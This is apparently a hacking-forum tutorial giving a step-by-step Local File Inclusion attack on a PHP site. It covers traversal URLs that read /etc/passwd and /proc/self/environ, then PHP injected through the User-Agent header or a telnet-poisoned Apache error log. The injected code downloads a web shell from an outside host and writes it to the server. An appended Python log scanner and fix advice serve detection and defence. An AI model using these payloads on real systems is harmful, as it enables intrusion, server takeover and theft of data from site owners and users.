[Method 1]
NOTE: You will need Firefox and its add-on Tamper Data to do this method!
LFI, or Local File Inclusion, allows you to include a local file (meaning a file that is stored on the server) and run it in a web script.
In this method we are going to upload a shell by accessing /proc/self/environ.
Now we have our page
http://www.target.com/index.php?include=register.php
And now we are going to do this:
http://www.target.com/index.php?include=../
If it gives you an error message, this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:
http://www.target.com/index.php?include=../etc/passwd
And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:
http://www.target.com/index.php?include=../etc/passwd
http://www.target.com/index.php?include=../../etc/passwd
http://www.target.com/index.php?include=../../../etc/passwd
And so on. Now let's say we got to this URL
http://www.target.com/index.php?include=../../../etc/passwd
And we see some huge shitty text we cannot handle. Now change the etc/passwd in the URL to proc/self/environ so it looks like this:
http://www.target.com/index.php?include=../../../proc/self/environ
If you see some text, you did good; if you see an error message, you did bad. Now this is the point where we use Tamper Data. Start Tamper Data and reload the page, and for the user agent type in the following PHP script:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is part of the text the include displays on the page, and any PHP code you put in it gets executed when the file is included.
Now simply access your shell by going to
http://www.target.com/shell.php
And rape the server.
[Method 2]
NOTE: This only works on Apache servers!
Alright, go back to the point where we tried to access etc/passwd. Use the same method, but instead of etc/passwd, try to get access to apache/logs/error.log
If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).
Now when you have found the file, open up cmd and type in
telnet www.target.com 80
When you are inside the telnet session, copy the following code (you use your own shell URL, of course)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Paste it into the telnet window, and press enter once or maybe twice (until you get an error message).
Now refresh the page in the browser (error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing the following into your browser:
http://www.target.com/shell.php
Lecture by ASim ALi AnSaRi
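A defender's view of both methods above, as an added example that is not part of the original post: a Python check over web-server access logs for the traces this chain leaves (traversal in a query parameter, the files named above, and PHP source in the User-Agent or request line). The log lines are constructed samples in Apache combined format, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" log format; quoted fields may hold backslash-escaped quotes.
LINE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]*\] "(?P<request>(?:\\.|[^"\\])*)" \d{3} \S+ '
    r'"(?P<referer>(?:\\.|[^"\\])*)" "(?P<agent>.*)"$'
)
TRAVERSAL = re.compile(r'\.\.[/\\]')
# Files the tutorial reads through the include parameter.
TARGETS = ("proc/self/environ", "etc/passwd", "error.log")
PHP_TAG = re.compile(r'<\?(?:php|=)', re.IGNORECASE)

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?include=register.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?include=../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:56:40 +0000] "GET /index.php?include=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 912 "-" "<?php /* constructed placeholder */ ?>"',
    '203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "<?php /* constructed placeholder */ ?>" 400 226 "-" "-"',
]

def inspect_line(line):
    """Return the reasons one access-log line matches the LFI chain."""
    m = LINE.match(line)
    if not m:
        return ["unparsable line"]
    reasons = []
    parts = m["request"].split(" ")
    query = parts[1].partition("?")[2] if len(parts) > 1 else ""
    for name, value in parse_qsl(query, keep_blank_values=True):  # percent-decodes
        if TRAVERSAL.search(value):
            reasons.append(f"traversal in '{name}'")
        if any(t in value.lower() for t in TARGETS):
            reasons.append(f"sensitive file in '{name}'")
    # PHP source in a header or request line only matters if a file that
    # records it (environ, a server log) is later passed to include().
    for field in ("request", "referer", "agent"):
        if PHP_TAG.search(m[field]):
            reasons.append(f"PHP tag in {field}")
    return reasons

def scan(lines):
    """Map 1-based line numbers to reasons, for flagged lines only."""
    hits = {}
    for number, line in enumerate(lines, 1):
        reasons = inspect_line(line.rstrip("\n"))
        if reasons:
            hits[number] = reasons
    return hits

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG).items():
        print(number, "; ".join(reasons))
```

Detection like this is a backstop. The fix for the bug itself is to stop passing the request parameter to include, for example by mapping it to a fixed list of known page names.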